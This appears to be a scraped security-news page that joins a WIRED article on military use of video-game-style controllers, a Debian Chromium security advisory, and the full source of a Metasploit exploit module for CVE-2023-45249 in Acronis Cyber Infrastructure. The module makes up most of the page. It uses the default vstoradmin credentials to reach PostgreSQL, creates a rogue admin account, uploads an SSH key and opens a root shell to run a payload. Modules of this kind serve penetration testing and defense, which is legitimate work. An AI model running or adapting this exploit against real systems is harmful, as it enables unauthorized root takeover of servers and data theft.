4.  Insights on Google Cloud Backup and Disaster Recovery Service
5.  Risk Management Strategies: Incorporating Cloud WAFs into Plan

How Cloud-Based Solutions Are Transforming Software Quality Assurance

After decades of relying on buttons, switches, and toggles, the Pentagon has embraced simple, ergonomic video-game-style controllers already familiar to millions of potential recruits.

In a future conflict, American troops will direct the newest war machines not with sprawling control panels or sci-fi-inspired touchscreens, but controls familiar to anyone who grew up with an Xbox or PlayStation in their home.

Over the past several years, the US Defense Department has been gradually integrating what appear to be variants of the Freedom of Movement Control Unit (FMCU) handsets as the primary control units for a variety of advanced weapons systems, according to publicly available imagery published to the department’s Defense Visual Information Distribution System media hub.

Those systems include the new Navy Marine Corps Expeditionary Ship Interdiction System (NMESIS) launcher, a Joint Light Tactical Vehicle–based anti-ship missile system designed to fire the new Naval Strike Missile that’s essential to the Marine Corps’ plans for a notional future war with China in the Indo-Pacific; the Army’s new Maneuver-Short Range Air Defense (M-SHORAD) system that, bristling with FIM-92 Stinger and AGM-114 Hellfire missiles and a 30-mm chain gun mounted on a Stryker infantry fighting vehicle, is seen as a critical anti-air capability in a potential clash with Russia in Eastern Europe; the Air Force’s MRAP-based Recovery of Air Bases Denied by Ordnance (RADBO) truck that uses a laser to clear away improvised explosive devices and other unexploded munitions; and the Humvee-mounted High Energy Laser-Expeditionary (HELEX) laser weapon system currently undergoing testing by the Marine Corps.

The FMCU has also been employed on a variety of experimental unmanned vehicles, and according to a 2023 Navy contract, the system will be integral to the operation of the AN/SAY-3A Electro-Optic Sensor System (or “I-Stalker”) that’s designed to help the service’s future Constellation-class guided-missile frigates track and engage incoming threats.

Produced since 2008 by Measurement Systems Inc. (MSI), a subsidiary of British defense contractor Ultra that specializes in human-machine interfaces, the FMCU offers a similar form factor to the standard Xbox or PlayStation controller but with a ruggedized design intended to safeguard its sensitive electronics against whatever hostile environs American service members may find themselves in. A longtime developer of joysticks used on various US naval systems and aircraft, MSI has served as a subcontractor to major defense “primes” like General Atomics, Boeing, Lockheed Martin, and BAE Systems to provide the handheld control units for “various aircraft and vehicle programs,” according to information compiled by federal contracting software GovTribe.

“With the foresight to recognize the form factor that would be most accessible to today’s warfighters, \[Ultra\] has continued to make the FMCU one of the most highly configurable and powerful controllers available today,” according to Ultra. (The company did not respond to multiple requests for comment from WIRED.)

The endlessly customizable FMCU isn’t totally new technology: According to Ultra, the system has been in use since at least 2010 to operate the now-sundowned Navy’s MQ-8 Fire Scout unmanned autonomous helicopter and the Ground Based Operational Surveillance System (GBOSS) that the Army and Marine Corps have both employed throughout the global war on terror. But the recent proliferation of the handset across sophisticated new weapon platforms reflects a growing trend in the US military towards controls that aren’t just uniquely tactile or ergonomic in their operation, but inherently familiar to the next generation of potential warfighters before they ever even sign up to serve.

“For RADBO, the operators are generally a much younger audience,” an Air Force spokesman tells WIRED. “Therefore, utilizing a PlayStation or Xbox type of controller such as the FMCU seems to be a natural transition for the gaming generation.”

An Xbox game controller used to maneuver the photonic mast aboard the USS _Colorado_ submarine in 2018.Photograph: Courtesy of U.S. Navy/Mass Communication Specialist First Class Steven Hoskins

Indeed, that the US military is adopting specially built video-game-style controllers may appear unsurprising: The various service branches have long experimented with commercial off-the-shelf console handsets for operating novel systems. The Army and Marine Corps have for more than a decade used Xbox controllers to operate small unmanned vehicles, from ground units employed for explosive ordnance disposal to airborne drones, as well as larger assets like the M1075 Palletized Loading System logistics vehicle. Meanwhile, the “photonics mast” that has replaced the traditional periscope on the Navy’s new Virginia-class submarines uses the same inexpensive Xbox handset, as does the service’s Multifunctional Automated Repair System robot that’s employed on surface warships to address everything from in-theater battle damage repair to shipyard maintenance.

This trend is also prevalent among defense industry players angling for fresh Pentagon contracts: Look no further than the LOCUST Laser Weapon System developed by BlueHalo for use as the Army’s Palletized-High Energy Laser (P-HEL) system, which explicitly uses an Xbox controller to help soldiers target incoming drones and burn them out of the sky—not unlike the service’s previous ventures into laser weapons.

"By 2006, games like _Halo_ were dominant in the military," Tom Phelps, then a product director at iRobot, told Business Insider in 2013 of the company’s adoption of a standard Xbox controller for its PackBot IED disposal robot. "So we worked with the military to socialize and standardize the concept … It was considered a very strong success, younger soldiers with a lot of gaming experience were able to adapt quickly."

Commercial video game handsets have also proven popular beyond the ranks of the US military, from the British Army’s remote-controlled Polaris MRZR all-terrain vehicle to Israel Aerospace Industries’ Carmel battle tank, the latter of which had its controls developed with feedback from teenage gamers who reportedly eschewed the traditional fighter jet-style joystick in favor of a standard video game handset. More recently, Ukrainian troops have used PlayStation controllers and Steam Decks to direct armed unmanned drones and machine gun turrets against invading Russian forces. And these controllers have unusual non-military applications as well: Most infamously, the OceanGate submarine that suffered a catastrophic implosion during a dive to the wreck of the Titanic in June 2023 was operated with a version of a Logitech F710 controller, as CBS News reported at the time.

“They are far more willing to experiment, they are much less afraid of technology … It comes to them naturally,” Israeli Defense Forces colonel Udi Tzur told The Washington Post in 2020 of optimizing the Carmel tank’s controls for younger operators. “It’s not exactly like playing _Fortnite_, but something like that, and amazingly they bring their skills to operational effectiveness in no time. I’ll tell you the truth, I didn’t think it could be reached so quickly.”

There are clear advantages to using cheap video-game-style controllers to operate advanced military weapons systems. The first is a matter of, well, control: Not only are video game handsets more ergonomic, but the configuration of buttons and joysticks offers tactile feedback not generally available from, say, one of the US military’s now-ubiquitous touchscreens. The Navy in particular learned this the hard way following the 2017 collision between the Arleigh Burke-class destroyer USS _John S. McCain_ and an oil tanker off the coast of Singapore, an incident that prompted the service to swap out its bridge touchscreens for mechanical throttles across its guided-missile destroyer fleet after a National Transportation Safety Board report on the accident noted that sailors preferred the latter because “they provide\[d\] both immediate and tactile feedback to the operator.” Sure, a US service member may not operate an Xbox controller with a “rumble” feature, but the configuration of video-game-style controllers like the FMCU does offer significant tactile (and tactical) advantages over dynamic touchscreens, a conclusion several studies appear to reinforce.

But the real advantage of video-game-style controllers for the Pentagon is, as military officials and defense contractors have noted, their familiarity to the average US service member. As of 2024, more than 190.6 million Americans of all ages, or roughly 61 percent of the country, played video games, according to an annual report from the Entertainment Software Association trade group, while data from the Pew Research Center published in May indicates that 85 percent of American teenagers say they play video games, with 41 percent reporting that they play daily.

In terms of specific video games systems, the ESA report indicates that consoles and their distinctive controllers reign supreme among Gen Z and Gen Alpha—both demographic groups that stand to eventually end up fighting in America’s next big war. The Pentagon is, in the words of military technologist Peter W. Singer, “free-riding” off a video game industry that has spent decades training Americans on a familiar set of controls and ergonomics that, at least since the PlayStation introduced elongated grips in the 1990s, have been standard among most game systems for years (with apologies to the Wii remote that the Army eyed for bomb-disposal robots nearly two decades ago).

“The gaming companies spent millions of dollars developing an optimal, intuitive, easy-to-learn user interface, and then they went and spent years training up the user base for the US military on how to use that interface,” Singer said in a March 2023 interview. “These designs aren’t happenstance, and the same pool they’re pulling from for their customer base, the military is pulling from … and the training is basically already done.”

At the moment, it’s unclear how exactly many US military systems use the FMCU. When reached for comment, the Pentagon confirmed the use of the system on the NMESIS, M-SHORAD, and RADBO weapons platforms and referred WIRED to the individual service branches for additional details. The Marine Corps confirmed the handset’s use with the GBOSS, while the Air Force again confirmed the same for the RADBO. The Navy stated that the service does not currently use the FMCU with any existing systems; the Army did not respond to requests for comment.

How far the FMCU and its commercial off-the-shelf variants will spread throughout the ranks of the US military remains to be seen. But controls that effectively translate human inputs into machine movement tend to persist for decades after their introduction: After all, the joystick (or “control column,” in military parlance) has been a fixture of military aviation since its inception. Here’s just hoping that the Pentagon hasn’t moved on to the Power Glove by the time the next big war rolls around.

How This Video Game Controller Became the US Military’s Weapon of Choice

Debian Linux Security Advisory 5781-1 - Security issues were discovered in Chromium which could result in the execution of arbitrary code, denial of service, or information disclosure.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA256- -------------------------------------------------------------------------Debian Security Advisory DSA-5781-1                   security@debian.orghttps://www.debian.org/security/                           Andres SalomonOctober 03, 2024                      https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : chromiumCVE ID         : CVE-2024-7025 CVE-2024-9369 CVE-2024-9370Security issues were discovered in Chromium which could resultin the execution of arbitrary code, denial of service, or informationdisclosure.For the stable distribution (bookworm), these problems have been fixed inversion 129.0.6668.89-1~deb12u1.We recommend that you upgrade your chromium packages.For the detailed security status of chromium please refer toits security tracker page at:https://security-tracker.debian.org/tracker/chromiumFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCAAdFiEEUAUk+X1YiTIjs19qZF0CR8NudjcFAmb+VpEACgkQZF0CR8NudjcrIBAAvzzNE73GYxK9O94ezzRCwoQ9+63+b//jaehANfSl4yhHdZfGpg2WuR2SBjtFUMc92gFUzrvtgKe/+gg5kY4r02YZkyZNEHsh5b5VjLBKjfMk4f+RnnEujqEFB1EDeBMbyRfMoi3dHlij4Gb4x+gpuxBJkoBa5DCnu3RD/KGWVMNw7AdDH2XUprGZ56qxzIdXIggj23baFwd3ms6aPpKVufB+RYvyj8qr+uIo1pyRdHZGjeZmbxwGLGA7R8VOfBJ4hj7bn63aNANYbgm5nzSYz7onmLhHIxlmGonDU2lsr34Kl9dViHz5peoMtlSfv9/zLaHXmJUEmXXL8Vf3jm975hcYSaWWggvnMVysWljSAbPuLloLISATzdLGDeHPtJDqX+Y9XjN2UZ1sJHRGRog5iZBPwj6H4QN8quGoGY9JxBlL3FOmgmMafZkUncEAKitpahtEMEsmayMl3iePHIulOUdOCVpnrGgaa1Lc0yAkR1VomlMrjrE2FB28y+dh4MiaERxMnO7EfSSRQ0nTD55iBzpdn3dRIDErqfMFyWSAfCDvPGhcRYU0vQaKysujrg+pUldkpIMPLnZvyytQFH6A9lYth9NBdAgMc1IN86BEyUXGcUTIO4FdQE+9QsWC3p7Iji/XK0WvEmXNjYe1M7zDFELRFxdhW6qVX9Xx2N+pTpM==V9OV-----END PGP SIGNATURE-----

Debian Security Advisory 5781-1

Acronis Cyber Infrastructure (ACI) is an IT infrastructure solution that provides storage, compute, and network resources. Businesses and Service Providers are using it for data storage, backup storage, creating and managing virtual machines and software-defined networks, running cloud-native applications in production environments. This Metasploit module exploits a default password vulnerability in ACI which allow an attacker to access the ACI PostgreSQL database and gain administrative access to the ACI Web Portal. This opens the door for the attacker to upload SSH keys that enables root access to the appliance/server. This attack can be remotely executed over the WAN as long as the PostgreSQL and SSH services are exposed to the outside world. ACI versions 5.0 before build 5.0.1-61, 5.1 before build 5.1.1-71, 5.2 before build 5.2.1-69, 5.3 before build 5.3.1-53, and 5.4 before build 5.4.4-132 are vulnerable.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##require 'sshkey'class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include BCrypt  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::Remote::Postgres  include Msf::Exploit::Remote::SSH  prepend Msf::Exploit::Remote::AutoCheck  # ssh_socket  attr_accessor :ssh_socket  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Acronis Cyber Infrastructure default password remote code execution',        'Description' => %q{          Acronis Cyber Infrastructure (ACI) is an IT infrastructure solution that provides storage,          compute, and network resources. Businesses and Service Providers are using it for data storage,          backup storage, creating and managing virtual machines and software-defined networks, running          cloud-native applications in production environments.          This module exploits a default password vulnerability in ACI which allow an attacker to access          the ACI PostgreSQL database and gain administrative access to the ACI Web Portal.          This opens the door for the attacker to upload SSH keys that enables root access          to the appliance/server. This attack can be remotely executed over the WAN as long as the          PostgreSQL and SSH services are exposed to the outside world.          ACI versions 5.0 before build 5.0.1-61, 5.1 before build 5.1.1-71, 5.2 before build 5.2.1-69,          5.3 before build 5.3.1-53, and 5.4 before build 5.4.4-132 are vulnerable.        },        'Author' => [          'h00die-gr3y <h00die.gr3y[at]gmail.com>', # Metasploit module          'Acronis International GmbH', # discovery        ],        'References' => [          ['CVE', '2023-45249'],          ['URL', 'https://security-advisory.acronis.com/advisories/SEC-6452'],          ['URL', 'https://attackerkb.com/topics/T2b62daDsL/cve-2023-45249']        ],        'License' => MSF_LICENSE,        'Platform' => ['unix', 'linux'],        'Privileged' => true,        'Arch' => [ARCH_CMD],        'Targets' => [          [            'Unix/Linux Command',            {              'Platform' => ['unix', 'linux'],              'Arch' => ARCH_CMD,              'Type' => :unix_cmd            }          ],          [            'Interactive SSH',            {              'Type' => :ssh_interact,              'DefaultOptions' => {                'PAYLOAD' => 'generic/ssh/interact'              },              'Payload' => {                'Compat' => {                  'PayloadType' => 'ssh_interact'                }              }            }          ]        ],        'DefaultTarget' => 0,        'DisclosureDate' => '2024-07-24',        'DefaultOptions' => {          'SSL' => true,          'RPORT' => 8888,          'USERNAME' => 'vstoradmin',          'PASSWORD' => 'vstoradmin',          'DATABASE' => 'keystone',          'SSH_TIMEOUT' => 30,          'WfsDelay' => 5        },        'Notes' => {          'Stability' => [CRASH_SAFE],          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS],          'Reliability' => [REPEATABLE_SESSION]        }      )    )    deregister_options('SQL', 'RETURN_ROWSET', 'VERBOSE')    register_options([      OptString.new('TARGETURI', [true, 'Path to the Acronis Cyber Infra application', '/']),      OptPort.new('DBPORT', [true, 'PostgreSQL DB port', 6432]),      OptPort.new('SSHPORT', [true, 'SSH port', 22]),      OptString.new('PRIV_KEY_FILE', [false, 'SSH private key file in PEM format (ssh-keygen -t rsa -b 2048 -m PEM -f <priv_key_file>)', ''])    ])    register_advanced_options([      OptInt.new('ConnectTimeout', [ true, 'Maximum number of seconds to establish a TCP connection', 10])    ])  end  # add an admin user to the Acronis PostgreSQL DB (keystone) using default credentials (vstoradmin:vstoradmin)  def add_admin_user(username, userid, password)    vprint_status("Creating admin user #{username} with userid #{userid}")    # add new admin user to the user table    res_query = postgres_query("INSERT INTO \"user\" VALUES(\'#{userid}\','{}','T',NULL,NULL,NULL,'default');", datastore['VERBOSE'])    return false unless res_query.keys[0] == :complete    # add new admin user to the local_user table    res_query = postgres_query('SELECT * FROM "local_user" WHERE id = ( SELECT MAX (id) FROM "local_user" );', datastore['VERBOSE'])    return false unless res_query.keys[0] == :complete    id_luser = res_query[:complete].rows[0][0].to_i + 1    res_query = postgres_query("INSERT INTO \"local_user\" VALUES(\'#{id_luser}\',\'#{userid}\','default',\'#{username}\',NULL,NULL);", datastore['VERBOSE'])    return false unless res_query.keys[0] == :complete    # hash the password    password_hash = Password.create(password)    today = Date.today    vprint_status("Setting password #{password} with hash #{password_hash}")    res_query = postgres_query('SELECT * FROM "password" WHERE id = ( SELECT MAX (id) FROM "password" );', datastore['VERBOSE'])    return false unless res_query.keys[0] == :complete    id_pwd = res_query[:complete].rows[0][0].to_i + 1    res_query = postgres_query("INSERT INTO \"password\" VALUES(\'#{id_pwd}\',\'#{id_luser}\',NULL,'F',\'#{password_hash}\',0,NULL,DATE \'#{today}\');", datastore['VERBOSE'])    return false unless res_query.keys[0] == :complete    # Getting the admin roles and assign this to the new admin user    vprint_status('Getting the admin roles')    res_query = postgres_query("SELECT * FROM \"project\" WHERE name = 'admin' AND domain_id = 'default';", datastore['VERBOSE'])    return false unless res_query.keys[0] == :complete    id_project_role = res_query[:complete].rows[0][0]    res_query = postgres_query("SELECT * FROM \"role\" WHERE name = 'admin';", datastore['VERBOSE'])    return false unless res_query.keys[0] == :complete    id_admin_role = res_query[:complete].rows[0][0]    vprint_status("Assigning the admin roles: #{id_project_role} and #{id_admin_role}")    res_query = postgres_query("INSERT INTO \"assignment\" VALUES('UserProject',\'#{userid}\',\'#{id_project_role}\',\'#{id_admin_role}\','F');", datastore['VERBOSE'])    return false unless res_query.keys[0] == :complete    vprint_status("Successfully created admin user #{username} with password #{password} to access the Acronis Admin Portal.")    true  end  # create SSH session.  # based on the ssh_opts can this be key or password based.  # if login is successfull, return true else return false. All other errors will trigger an immediate fail  def do_sshlogin(ip, user, ssh_opts)    begin      ::Timeout.timeout(datastore['SSH_TIMEOUT']) do        self.ssh_socket = Net::SSH.start(ip, user, ssh_opts)      end    rescue Rex::ConnectionError      fail_with(Failure::Unreachable, 'Disconnected during negotiation')    rescue Net::SSH::Disconnect, ::EOFError      fail_with(Failure::Disconnected, 'Timed out during negotiation')    rescue Net::SSH::AuthenticationFailed      return false    rescue Net::SSH::Exception => e      fail_with(Failure::Unknown, "SSH Error: #{e.class} : #{e.message}")    end    fail_with(Failure::Unknown, 'Failed to start SSH socket') unless ssh_socket    return true  end  # login at the Acronis Cyber Infrastructure web portal  def aci_login(name, pwd)    post_data = {      username: name.to_s,      password: pwd.to_s    }.to_json    res = send_request_cgi({      'method' => 'POST',      'ctype' => 'application/json',      'keep_cookies' => true,      'headers' => {        'X-Requested-With' => 'XMLHttpRequest'      },      'uri' => normalize_uri(target_uri.path, 'api', 'v2', 'login'),      'data' => post_data.to_s    })    return res&.code == 200  end  # returns cluster id or nil if not found  def get_cluster_id    res = send_request_cgi({      'method' => 'GET',      'ctype' => 'application/json',      'keep_cookies' => true,      'headers' => {        'X-Requested-With' => 'XMLHttpRequest'      },      'uri' => normalize_uri(target_uri.path, 'api', 'v2', 'clusters')    })    return unless res&.code == 200    return unless res.body.include?('data') && res.body.include?('id')    # parse json response and get the version    res_json = res.get_json_document    return if res_json.blank?    res_json['data'].each do |cluster|      return cluster['id'] unless cluster['id'].nil?    end  end  # upload the SSH public key using the cluster_id defined at the Acronis Cyber Infrastructure web portal  def upload_sshkey(sshkey, cluster_id)    post_data = {      key: sshkey.to_s,      event:      {        name: 'SshKeys',        method: 'post',        data:        {          key: sshkey.to_s        }      }    }.to_json    res = send_request_cgi({      'method' => 'POST',      'ctype' => 'application/json',      'keep_cookies' => true,      'headers' => {        'X-Requested-With' => 'XMLHttpRequest'      },      'uri' => normalize_uri(target_uri.path, 'api', 'v2', cluster_id.to_s, 'ssh-keys'),      'data' => post_data.to_s    })    return true if res&.code == 202 && res.body.include?('task_id')    false  end  def execute_command(cmd, _opts = {})    Timeout.timeout(datastore['WfsDelay']) { ssh_socket.exec!(cmd) }  rescue Timeout::Error    @timeout = true  end  # return ACI version-release string or nil if not found  def get_aci_version    res = send_request_cgi({      'method' => 'GET',      'ctype' => 'application/json',      'headers' => {        'X-Requested-With' => 'XMLHttpRequest'      },      'uri' => normalize_uri(target_uri.path, 'api', 'v2', 'about')    })    return unless res&.code == 200    return unless res.body.include?('storage-release')    # parse json response and get the version    res_json = res.get_json_document    return if res_json.blank?    version = res_json['storage-release']['version']    return if version.nil?    release = res_json['storage-release']['release']    return if release.nil?    "#{version}-#{release}".gsub(/[[:space:]]/, '')  end  def check    version_release = get_aci_version    return CheckCode::Unknown('Could not retrieve the version information.') if version_release.nil?    return CheckCode::Appears("Version #{version_release}") if Rex::Version.new(version_release) < Rex::Version.new('5.0.1-61')    case version_release.split(/\.\d-/)[0]    when '5.0'      return CheckCode::Appears("Version #{version_release}") if Rex::Version.new(version_release) < Rex::Version.new('5.0.1-61')    when '5.1'      return CheckCode::Appears("Version #{version_release}") if Rex::Version.new(version_release) < Rex::Version.new('5.1.1-71')    when '5.2'      return CheckCode::Appears("Version #{version_release}") if Rex::Version.new(version_release) < Rex::Version.new('5.2.1-69')    when '5.3'      return CheckCode::Appears("Version #{version_release}") if Rex::Version.new(version_release) < Rex::Version.new('5.3.1-53')    when '5.4'      return CheckCode::Appears("Version #{version_release}") if Rex::Version.new(version_release) < Rex::Version.new('5.4.4-132')    end    CheckCode::Safe("Version #{version_release}")  end  def exploit    # connect to the PostgreSQL DB with default credentials    fail_with(Failure::Unreachable, "Can not connect to PostgreSQL DB on port #{datastore['DBPORT']}.") unless postgres_login({ port: datastore['DBPORT'] }) == :connected    # add a new admin user    username = Rex::Text.rand_text_alphanumeric(5..8).downcase    userid = SecureRandom.hex    password = Rex::Text.rand_password    print_status("Creating admin user #{username} with password #{password} for access at the Acronis Admin Portal.")    fail_with(Failure::BadConfig, "Adding admin credentials #{username}:#{password} failed.") unless add_admin_user(username, userid, password)    # storing credentials at the msf database    print_status('Saving admin credentials at the msf database.')    store_valid_credential(user: username, private: password)    # log out from the postsgreSQL DB    postgres_logout if postgres_conn    # create or use own SSH private key    if datastore['PRIV_KEY_FILE'].blank?      print_status('Creating SSH private and public key.')      k = SSHKey.generate(comment: 'root')    else      print_status("Using your own SSH private key file: #{datastore['PRIV_KEY_FILE']} in PEM format.")      fail_with(Failure::NotFound, "Can not find or open SSH private key file: #{datastore['PRIV_KEY_FILE']}") unless File.file?(File.expand_path(datastore['PRIV_KEY_FILE']))      f = File.read(File.expand_path(datastore['PRIV_KEY_FILE']))      k = SSHKey.new(f, comment: 'root')    end    vprint_status(k.private_key)    vprint_status(k.ssh_public_key)    # storing SSH public and private key at the msf database    print_status('Saving SSH public and private key pair at the msf database.')    store_valid_credential(user: 'ACI SSH public key', private: k.ssh_public_key)    store_valid_credential(user: 'ACI SSH private key', private: k.private_key)    # log in with the new admin user credentials at the Acronis Admin Portal    fail_with(Failure::NoAccess, "Failed to authenticate at the Acronis Admin Portal with #{username} and #{password}") unless aci_login(username, password)    # get cluster id to upload the SSH keys    print_status('Getting the cluster information to upload the SSH public key at the Acronis Admin Portal.')    cluster_id = get_cluster_id    fail_with(Failure::NotFound, 'Can not find a cluster and retrieve the id.') if cluster_id.nil?    # upload the public ssh key at the Acronis Admin Portal to enable root access via SSH    print_status('Uploading SSH public key at the Acronis Admin Portal.')    fail_with(Failure::NoAccess, 'Failed to upload SSH public key.') unless upload_sshkey(k.ssh_public_key, cluster_id)    # login with SSH private key to establish SSH root session    ssh_opts = ssh_client_defaults.merge({      auth_methods: ['publickey'],      key_data: [ k.private_key ],      port: datastore['SSHPORT']    })    ssh_opts.merge!(verbose: :debug) if datastore['SSH_DEBUG']    print_status('Authenticating with SSH private key.')    fail_with(Failure::NoAccess, 'Failed to authenticate with SSH.') unless do_sshlogin(datastore['RHOST'], 'root', ssh_opts)    print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")    case target['Type']    when :unix_cmd      execute_command(payload.encoded)    when :ssh_interact      handler(ssh_socket)      return    end    @timeout ? ssh_socket.shutdown! : ssh_socket.close  endend

Tag

#ssl